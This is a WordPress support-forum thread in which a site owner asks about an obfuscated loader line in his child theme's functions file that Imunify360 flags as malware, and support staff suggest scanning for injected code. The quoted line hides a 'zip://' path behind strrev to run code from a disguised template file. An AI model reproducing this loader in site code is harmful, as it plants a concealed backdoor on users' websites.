
I have a file in my Pro Child Theme called:

there is also a function linking to this theme in the functions file:
/* Pro Child Theme Template Loader */
load_template( strrev( “//:piz” ) . locate_template( “pro-child.template” ) . “#template”, true );

I dont think I have ever seen this, and Imunify360 is flagging it as malware. Removing the function and the file breaks the site…

any idea what is going on?

Hey Riceman,

Thanks for reaching out!

Just want to let you know that enhancing custom code form 3rd party is outside the scope of our theme support but we need to check if there’s something we can do on your website. Please give us the following information in a Secure Note.

  • WordPress Login URL
  • Admin level username and password

You can find the Secure Note button at the bottom of your posts.

Thank you.

Thanks. Well, I am not looking for custom coding. Just wondering if you or anyone in the forum has ever seen this before? Imunify360 tells me this is malware…and I do not see this on any other installations of Pro.

Hey Riceman,

It could be some of your plugins are causing the code injection in your child theme. It would be best to recheck all the files for some malicious items or you can run a malware checker plugin.

Hope that helps.

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